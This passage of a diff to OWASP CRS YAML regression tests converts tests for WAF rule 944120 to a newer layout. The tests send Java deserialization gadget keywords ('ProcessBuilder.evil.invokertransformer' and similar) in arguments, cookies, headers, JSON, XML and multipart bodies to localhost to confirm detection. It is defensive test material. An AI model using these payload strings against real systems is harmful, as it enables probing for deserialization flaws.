ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: 
"POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 80 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-83 + {"ProcessBuilder.evil.invokertransformer": "test"} + 
-----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 83 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-84 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-85 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - 
Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-86 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: 
+ log_contains: "id \"944120\"" + - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" 
- Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 94 desc: "XML element value includes keyword 
ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 96 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-100 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-101 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-102 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 